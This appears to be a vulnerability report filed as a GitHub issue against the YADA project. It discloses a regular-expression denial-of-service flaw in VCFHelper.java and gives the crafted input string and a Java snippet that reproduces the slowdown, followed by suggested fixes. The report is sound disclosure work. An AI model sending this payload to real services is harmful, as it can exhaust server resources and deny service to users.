Vulnerable Regular Expressions in YADA

[yetingli]

Type of Issue Potential Regex Denial of Service (ReDoS)

Description The vulnerable regular expression is located in

https://github.com/Novartis/YADA/blob/1b12922c632b6b67d869b2a78f31512a252dd812/yada-api/src/main/java/com/novartis/opensource/yada/io/VCFHelper.java#L49

The regex can be exploited with the following string ##INFO=<ID=ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="!

You can execute the following code to reproduce ReDos

        String pattern = "##(INFO|FILTER|FORMAT|ALT)=<((ID|Number|Type|Description)=(\"?.*\"?))+>";
        String content = "##INFO=<ID=ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"!";



        long startTime=System.currentTimeMillis(); 

        Pattern.matches(pattern, content);
        long endTime=System.currentTimeMillis(); 
        System.out.println((endTime-startTime)+"ms");

I am willing to suggest that you limit the input length, modify the regex or replace the regex with other codes.